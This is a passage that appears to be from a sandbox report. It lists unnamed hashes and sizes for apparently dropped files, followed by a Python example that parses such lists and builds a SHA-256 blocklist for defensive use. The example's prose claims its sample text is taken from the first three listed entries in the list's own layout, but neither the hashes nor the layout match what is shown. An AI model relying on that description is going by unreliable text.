  SHA1:   01edbfd0a59d9addad0f30c5777351c484c1fcd1
  SHA256: 4456f9a5d25296d8e6e184d50ec5355f01848263ce32e8379120a1077194a5ba
  SHA512: 4c947836d668dac764f0945c3438a0e1aae6c647560907a96096a6af9795a4b753f1c138e526d06029d364a28e900cbca07566c56df14764d232e3bacbca6c93
- 436KB
  MD5:    46fc9e5e1fbeed55281cd5f25310f8d3
  SHA1:   be6bb9f76a2545781a628690602eab704ce1e64b
  SHA256: 0494a21fd6ec0405206dbe6c82525b895f09ff4c240a301e1baae682c5ad80a2
  SHA512: c7b3a65f50a6e0bffea72a215fa717378c93d767d287c711912dda55dff6294bd2266a502cfe80aea4c6bdaae03170bd5b50bdcc175bcd146c6a79ed7bee0b5b
- 2.1MB
  MD5:    b6cc199e11c8173382c129c7580d1160
  SHA1:   218a3fe633e91585891f5533e980345b0b36edf1
  SHA256: 8a2d24173df00f8af5787df985d10c4b678c800eebb40eb0be876e2ace647b10
  SHA512: 116862fb184e8229e8ac6310e24809e900ed0273c56dec36fa0c77ec660631ce4e9616b650dfce655b9dc375e6ff7644abeebaa2c65a8fb1f4297e77135834dd
- 5.0MB
  MD5:    a4e84bdb6fba7b3c5689b0f2bc5ec858
  SHA1:   6ef4aaf5a594b23cb64e168824b1fc2376cf6c5e
  SHA256: 48605846c229a73a9695d0a6567982bb558e5108b2251b74ad2cdba66e332632
  SHA512: c2241abab28b6d31f33fb17b89983fbfdfe03d55ca1078e8de29e4b56328ed5933c577c0e0865d8edcf897b9d752e8a011a22297f9d87cb683ce9f0522f763ea
- 435KB
  MD5:    794a7bc49c07d085d9e3cd15515f961d
  SHA1:   ba3c257dc49a4fef8f59465b179b505db096fe33
  SHA256: 3ba0f4f8645247e4f440e38ca2b0f91bed5d239452e97054e75e25d371ec4d98
  SHA512: 6d56bbe23e395fa4839bc96e4632e6e98b2834b0a11fb34322c96f50a2b734f7a0d00f2c5b458766e389c739c3d5d03fec661038737ff6c340e3a7754a6b2f97
- 3.1MB
  MD5:    4a603ec4e3c5a21400eaabac7c6401c6
  SHA1:   23b446721eacd0b6796407ca20bd1e01355ab41f
  SHA256: 566ba756b7fc2174fc195c05d9e0a36aa706e4ce397f890488227b7d0ad4ad7c
  SHA512: 070a5dd14bce16ba58eb65f3b3143fc7890f0e34f2ed7f3a1930e3fa8454ebcf615b43c819f16f4fc494676443bd409a3a57e8fe6e8f39ab02df5ace497eaea0
- 2.5MB
  MD5:    be320b59ef29060678bcb78d6c8fa059
  SHA1:   eb76091dc908c5bcf1ddd24900f53b6d9119bf53
  SHA256: 9fdadcad0d51590fd9b604d464cdac18c9b34d43b4194c7d54110b299a841145
  SHA512: 8015324abb929d2ff22c1ba96bf79fe2393a16ad9daa93caef756ab41122b9e582fca68aaf8b625934aad3140223db6928a105633bb5ca209a2a3980383383fc
- 5.2MB
  MD5:    1e9371c7eb8b2ad613afd09eab341887
  SHA1:   845e0f5c40104d431b8f690754671bd7c3531fc8
  SHA256: 88198ae8178cf02f541c8bd9211d73697ca68a643f1622b858063e3639e0aa27
  SHA512: 868574b6a840a05790b795669a02f12b73be1524c216222f79c4d1f61eed4292eecd4436aca697938e6675ebb765f5e5ca02fb6736824080dff18b112e649026
- 7.8MB
  MD5:    636ea646281c99d3d05cdefdca29cf5e
  SHA1:   77b6e50b8866f7b41d678995b8d448237edcddef
  SHA256: 01dde6eab064a347e1b0b8dc3074e7ac96203e1bbd1bec7cddf4b6fdfadee61c
  SHA512: f63f21d87a7204967b6de980f3385cfc48c6a956d6d071005e593b40886d5292b8ec62c604c76200f93136db81f5ee3626f1663b7ee7afc1a8f0fa3e37c64350
- 176KB
  MD5:    c4b190a1a8f5d8f4353cbd49da567e35
  SHA1:   fa51479767318ec1ed868ad80625748d416b3120
  SHA256: 7e954cf97b3d43923146e1118723eb095e07b81ef6acd6539a601c04a7b21ff5
  SHA512: e92d7c7267099b6103d8f9cc3f94daa4c662c5b13446fcc7a85bbe6f0d45beb8e0fe04539147f3d0aa4c3c5592ef1b0d72ef56620d7ee6733e50f5b2802ca1fa
- 291KB
  MD5:    7562a8f108271b96994b95ea35494f7f
  SHA1:   42bf054fd00311f2a47f89c0c1d5674ff485ac71
  SHA256: 0eda07e22619ffa11c789a1ebf945d8f8510a210dc7b1c898a9a09e706ad4b4c
  SHA512: e43076d160b33bd26845f7144e848b729d5fd329045835ced8d715dbcaff3fc0ca3bfad3f736a467c2835517fd548eee4aca8ec30a8655ec79777d5628e54259
- 5.5MB
  MD5:    461e951ba79964b681e9a8bc9d61a92c
  SHA1:   c860285cc237d35022fea21eba03c82e86ea3d1e
  SHA256: de36e0af9cd7e32d781be2ab937a7dca33a9f93dcbecd06ff944641e5196c51f
  SHA512: b85af74593267854a24d9a03a046c3d00cfd25401a9b304061f508d46c559e4773801dda28c0a54c15b2c9334fbfa2f391be9194828334cbe4be50811ed0c19f
- 2.7MB
  MD5:    6ea7a8430947755910dd530609ccd33c
  SHA1:   7afcd8da78c756f05dc245028e878bd9396722c6
  SHA256: 2ac2391710994cf90972b425abf650ec47326ec9a51063e94fc1bfa27d9b1f7c
  SHA512: 38a5aae0d369b744d6b28a56cff7c2a7c0fc94916cee6f6bb578e482682a3587757eceb3a9cd52731a7cfa26d49b3bd43fdbd73883511678c9659a5d6405946b
- 72KB
  MD5:    94604756b7991e2361c98c1ffd1a50ff
  SHA1:   b72f2589a2ad566cf45b58965721abf2ddd5c7f7
  SHA256: 7c2465e391b9f2bd8b257e5c8eef9ea09201c08c44f7b76d01467dcf1db52556
  SHA512: 68d959e6be422cf7ec23a439f30235b8f48f4e7dfffaf3293382100442f1f913d65b9f33f14fb98a54d7e657e294b645356150430730f5faf14ed95ef40b8a81
- 2.1MB
  MD5:    8da5f3d5477e870f00e2d5af6e50a0a2
  SHA1:   c596b93af682d40f87f14f29b815639b0ce0ebde
  SHA256: 17d9a25d421e02c4ddf2ce3da57224c02e5f8bb923b6a5eab3b65b7c4733318e
  SHA512: 2e97f5618c5f194331290412d9a7157b6c5ec932d699b6c70073d0c6c82a626a7cd3b1c00d4f135070fbbea25660870ef0f115517209dd49838674331470aeb5
- 36KB
  MD5:    f55d89f82515bde23bb272f930cb9492
  SHA1:   666d0f5a98f03292abf16cd2de599997c836926a
  SHA256: 4d9fb14e15d1613a7a5d70efbacb0f153729f02216116c3f7f117b033bd7655c
  SHA512: a7a62daf90aae27207b77034e8a76d5b3f8aa05430bd8768d46be7f3843962ddc1ef154691dc0f26051605fbb36269e59f18c3c75fdf72222346188e7a6cf03b
- 104KB
  MD5:    9a24a00438a4d06d64fe4820061a1b45
  SHA1:   6e59989652dff276a6dfa0f287b6c468a2f04842
  SHA256: 66944b456b33438cbf93d112d973112903f57dc16bf4c069e968562fa8f01b54
  SHA512: 80e97c8c389554ba0512b7f496dd03e82f2a627568eca631a6393033d540a70779fc7eae2485d1b9ca3657beb8ae9a86fd08ecd5dba678407bf8e63bef9a4629
- 49KB
  MD5:    ccb630a81a660920182d1c74b8db7519
  SHA1:   7bd1f7855722a82621b30dd96a651f22f7b0bf8a
  SHA256: a73dc535324b73ab10c09ed2b965fc1b504a828f6059ddf99e26b9c03642a346
  SHA512: 8fd536da55b8e2a514bcea9cbe62492af1168b7713ea5955f3af8fcfa8060eac4ee079022380ab5ba5f9f7610a595981ed2f472fb14d569ac82057c50a785811
- 73KB
  MD5:    26125c571d6225959832f37f9ac4629a
  SHA1:   ed7af3c41eaab7b10a2639f06212bd6ee0db6899
  SHA256: 94fada921a79c422e6dbf75eeca7429690d75901b5ef982a44874971b38708a0
  SHA512: 172b72f2a92c5ea119ee9369c91f6fb4431efc95fd7c1dad65c1d45886ae17025e55d7a2bf9bfbae6f163928799f0b79dc874ed19383aff281f5466a81b590d4
- 4.3MB
  MD5:    11863412761ab6f0dadd70d838ac3989
  SHA1:   5724e78c916f83766cfc219c42beb4948ff3315d
  SHA256: d12d4da3bab8a93ef31a5b25384c5e700299bada572d822f561e35138d15ae91
  SHA512: 1603837c5eea79c4785d1580fa29aaf06ae8ae05377e2ad271ad457675d40315350ee245e9039a241d9def0c068c48159a76fc7fdf7bd154165881ddd900c6e3
- 2KB
  MD5:    a69559718ab506675e907fe49deb71e9
  SHA1:   bc8f404ffdb1960b50c12ff9413c893b56f2e36f
  SHA256: 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
  SHA512: e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63
- 13KB
  MD5:    a813d18268affd4763dde940246dc7e5
  SHA1:   c7366e1fd925c17cc6068001bd38eaef5b42852f
  SHA256: e19781aabe466dd8779cb9c8fa41bbb73375447066bb34e876cf388a6ed63c64
  SHA512: b310ed4cd2e94381c00a6a370fcb7cc867ebe425d705b69caaaaffdafbab91f72d357966916053e72e68ecf712f2af7585500c58bb53ec3e1d539179fcb45fb4
- 680KB
  MD5:    2b1448b48874851ff092b32dae44cfea
  SHA1:   a156c72c6f87817a3c88a0232bbafa39aa36301b
  SHA256: 08d83cc7c62e673495c8e18b6ff1e7600397c7ff9c3bd3b580678d50fcf3e950
  SHA512: 923195ffefc70808c1f63688e40500021b4a75e660c00dd110e08a6910f8ac85aef0736116f76096fffb34966aafff1bb3c5c2d6ff809951a94b47e2625bb3a7
- 861KB
  MD5:    66064dbdb70a5eb15ebf3bf65aba254b
  SHA1:   0284fd320f99f62aca800fb1251eff4c31ec4ed7
  SHA256: 6a94dbda2dd1edcff2331061d65e1baf09d4861cc7ba590c5ec754f3ac96a795
  SHA512: b05c6c09ae7372c381fba591c3cb13a69a2451b9d38da1a95aac89413d7438083475d06796acb5440cd6ec65b030c9fa6cbdaa0d2fe91a926bae6499c360f17f
- 1.6MB
  MD5:    72491c7b87a7c2dd350b727444f13bb4
  SHA1:   1e9338d56db7ded386878eab7bb44b8934ab1bc7
  SHA256: 34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891
  SHA512: 583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511
- 458KB
  MD5:    619f7135621b50fd1900ff24aade1524
  SHA1:   6c7ea8bbd435163ae3945cbef30ef6b9872a4591
  SHA256: 344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2
  SHA512: 2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628
- 222B
  MD5:    68cecdf24aa2fd011ece466f00ef8450
  SHA1:   2f859046187e0d5286d0566fac590b1836f6e1b7
  SHA256: 64929489dc8a0d66ea95113d4e676368edb576ea85d23564d53346b21c202770
  SHA512: 471305140cf67abaec6927058853ef43c97bdca763398263fb7932550d72d69b2a9668b286df80b6b28e9dd1cba1c44aaa436931f42cc57766eff280fdb5477c
- 2.2MB
  MD5:    7fc02b51dd8ee71d01cf01ec2faa8cc6
  SHA1:   52d16d36ea5719177ac56d1420281587b84268e5
  SHA256: 87920f35f5b119fa851cc3e1be8d26669a86636d25fb5a1fc71d8e49c20426b1
  SHA512: f7c98a71882f8517b9c942222de7f5ef8b75a3b5699530f194ff1c670c1e4c4ab1622d2dbf5e9145df28d67491a96fd5c2e6b2ebf8aa9fa07415e4e7466bde5c
- 9KB
  MD5:    ed96024f86a8d005a58c85056c939b57
  SHA1:   304349dddbc2be0b786188aeb9f3e774b3eee000
  SHA256: 191472c620709b27aaf22d77531ad320de820f4470911d12ca947835b11985a3
  SHA512: d8b40cd1a478daeb50aaf641b5dca98f483b7164f06a0c7bc9ff73f3ae75197542518b1fa867622600f3b589756e493bba6baa88c98a284751f2a4abd710e07d
- 1.6MB
  MD5:    1dea9b52d271181663e8490fb0cfb259
  SHA1:   ecb5431dd5f2195fa006f6b122fbada1ee7814fa
  SHA256: 4d06d0ef87f79d86c05b505d6bb1726e76e032514de129b1421d660fd31b7934
  SHA512: fff4c592f7947f29fc3c1209f13d9c2b19a052e88cab59e1f18f0d30eb53b734601d8292dbfb2004d6ab13b72f36d3ef600808c83625aa32f5a152af6acc1812
- 21KB
  MD5:    3157f43bcc6254d4dd2b18ed3748cc0e
  SHA1:   e9268a22049763ada485c7ab61538767f1e5693e
  SHA256: 8abd4b8b64f0594bd1295a458d5f157fe6d3af3000318025273645c753ec18aa
  SHA512: 0ea5d6a6e12bc7fea0f1129aed97eb15801d9003033d96758810598bee9d8dc1a49626e655527cb7c758856e2c471e4801460abffdaeb2d8c4b7faebdb91d74e
- 1.6MB
  MD5:    6f4dc951bbb91da352f1b1736b9551dc
  SHA1:   c94c3fbb3a830f8a3f98963eef485ecbf7f8487b
  SHA256: ffeeaa61d3e4e3aeedbd1303757049b46e30bad6445e6d78f02efce265071404
  SHA512: da41d47ce5f4599bb7acbf71cfd22980f2f0f2cd74aecf1dc9664f349815a44389f13c0c2c70a89812ab665fb4b932f64f0a48664d63206e22db655f223406ea
- 468B
  MD5:    1005b0d4f17c3e5c9a8c0e89f3943c63
  SHA1:   5d5e9a7ad0c21cb256f7381cb1fd414aff83d102
  SHA256: db61ff7a98d6279ae8db81c9713407f42f673da134d2b12d31d0bae0a3eb00e7
  SHA512: 845c09bded690af0563c6f94357d591425604b4d34404c46caba5295c192dd7eb66b620d2656b4de6a26f90657e08f591b9b46bb3d821d5344329727f37d5540
- 35KB
  MD5:    38ddcc3df5a2a4e0ba797782b33fc5a1
  SHA1:   8a3387232b7501a623d4ba5a0b21f3ff88696647
  SHA256: 8d0c6c3d7235d59d403a8f02f234a7bca155c928addebfdb4fffac51d90503f3
  SHA512: 79b50ce781bd1a22e3b47eaa9a1dd1796974421c7741a1ebb7e6bc2818a53e2f74302fde89e89ee452476999a95542efffa7f2cddef7e392b9a67eaf370d9fbc
- 93KB
  MD5:    a318cc45e79498b93e40d5e5b9b76be4
  SHA1:   4ebc9969cc3c330741c377e22a5fb0cdb8ce5fd5
  SHA256: 4b4e596641d0dd9eece8a24556fd1246056cbc315a79675a7400927858bbd7c2
  SHA512: 3131d627837a3cafdf532173ccadd4beff933ee3d5e050366153434b1394c4d57056b4d273ddb826a1a0478caa83e1f6e095e83366102ae1d3705ab2d3ec0e2c
- 14KB
  MD5:    686899bd841d603551a0429d09cb906c
  SHA1:   c827bc460766c0c39fa9ad27918fb0f409379eb3
  SHA256: 483142a79ce1fce6474da5dcfeea48104eda46a960c7eb9b9581d555dd6cfc77
  SHA512: 850919af70b4b0548fc985b49fa35f5613c31bde6fb46b19753b181c25e0251c52b121a26459c230a969e8ae23fb1dccd547be6a34d2a73dfe4e0d31e6874b76
- 77B
  MD5:    13877fe8fb3b5604693f098ce86d1711
  SHA1:   9bc95df3c0a12eaabc1e00460d7d0aae8c15f35f
  SHA256: f2db62c42b700748f5b2f035dbe8f870cc6cab0c8d1c8721cbe18fa6438ac105
  SHA512: 049d6d0abecd59adebd20250316836b53cd15b7351eec0d1ed20b52e39ae9fa0bdfb23c5c141c89bf633ac402cf1f443c3f3d6faf97173eda4fecd4a79fd5443
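The hash list above carries no file names, so the only usable key for a blocklist is the digest itself. The parser below is an added example, not part of the report: it reads the list in the fused layout the page exports ("MD5<hex>" directly after a "Filesize" line) as well as a labelled "MD5: <hex>" layout, checks that every digest has the length its algorithm requires, converts the reported size to bytes, and derives a de-duplicated SHA-256 blocklist. The sample text is built from the first three entries above (the third rewritten in the labelled layout); the record layout and function names are this example's own.

```python
"""Parse a sandbox report's dropped-file hash list into validated records.
Added example, not part of the report; record layout and names are ours."""
import re
from dataclasses import dataclass

DIGEST_LEN = {"md5": 32, "sha1": 40, "sha256": 64, "sha512": 128}
DIGEST_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s*:?\s*([0-9a-fA-F]+)$", re.I)
SIZE_RE = re.compile(r"^(\d+(?:\.\d+)?)\s*(B|KB|MB|GB)$", re.I)
UNIT = {"b": 1, "kb": 1024, "mb": 1024 ** 2, "gb": 1024 ** 3}


@dataclass(frozen=True)
class DroppedFile:
    size: str          # size string as reported, e.g. "1.8MB"
    size_bytes: int    # approximate, derived from the reported size
    md5: str
    sha1: str
    sha256: str
    sha512: str


def is_valid_digest(algo, value):
    """True when value is hex of the length the named algorithm produces."""
    want = DIGEST_LEN.get(algo.lower(), -1)
    return len(value) == want and all(c in "0123456789abcdef" for c in value.lower())


def parse_size(text):
    m = SIZE_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised size: {text!r}")
    return int(float(m.group(1)) * UNIT[m.group(2).lower()])


def parse_dropped_files(text):
    """Records start at a 'Filesize' marker (size on the next line) or at a bare
    size line such as '- 23KB'; the four digests follow in any order."""
    records, current, want_size = [], None, False
    for raw in text.splitlines():
        line = raw.strip()
        if line in ("", "-"):
            continue
        if line == "Filesize":
            want_size = True
            continue
        size_text = line[2:] if line.startswith("- ") else line
        if want_size or SIZE_RE.match(size_text):
            current = {"size": size_text, "size_bytes": parse_size(size_text)}
            want_size = False
            continue
        if current is None:
            continue                      # header text before the first record
        m = DIGEST_RE.match(line)
        if not m:
            raise ValueError(f"unexpected line in hash list: {line!r}")
        algo, value = m.group(1).lower(), m.group(2).lower()
        if not is_valid_digest(algo, value):
            raise ValueError(f"{algo} digest has wrong length ({len(value)}): {value}")
        current[algo] = value
        if all(k in current for k in DIGEST_LEN):
            records.append(DroppedFile(**current))
            current = None
    return records


def sha256_blocklist(records):
    """Sorted, de-duplicated SHA-256 values, the natural key when no names are given."""
    return sorted({r.sha256 for r in records})


# Constructed sample: the first three entries of the list above, the first two in
# the fused layout the page exports and the third in a labelled layout.
SAMPLE_REPORT = """
-
Filesize
1.8MB
MD56a3652d0a357e1c4782f6a6a5d41e7df
SHA13be7727cc6b713476214b2e78d48b29877f7cec8
SHA256b712fa70a550a8da9748eeccee3ec3a453d31cada713ed56fd263a158a583171
SHA5120e11a64fb4d77d056c530871c09fb373dae9131b46ab7ce382ee7f80f49dd4d5a966798f4c4f37c26fa713b24da778035c8fdbadda907156a43dfba55c0e0f0f
-
Filesize
126KB
MD56719de6f0c460bde4c3d56e01952e093
SHA16bc39ada34ab4021afc74120f385ab620e62be88
SHA2561af4abae2b2760280dfa6ceb1dd1e3a2a03c986fb64ef32540811be5d5c90ad7
SHA51212b2f5c172e471f9962641221d8120e0c553d0f591133d1971b8f2096095e8ecf65596c65264575f5dddb74828e5eb3fe32bd66fa6ca12472fbab1e01d8c4920
- 23KB
  MD5:    90b85ffbdeead1be861d59134ea985b0
  SHA1:   55e9859aa7dba87678e7c529b571fdf6b7181339
  SHA256: ed0dc979eed9ab9933c49204d362de575c7112a792633fda75bb5d1dab50a5c2
  SHA512: 8a1c10bbfe5651ab25bf36f4e8f2f65424c8e1004696c8141498b99ea2fbd7b3e5fae4d2cfee6835f7ff46bd2333602f4d8ac4a0f5b8e9757adb176332a3afce
"""
```

Length validation matters with the fused layout: "SHA1" followed by a digest that happens to start with a digit is only distinguishable from a mislabelled line by the resulting length, so a digest of the wrong length is rejected rather than silently stored under the wrong algorithm.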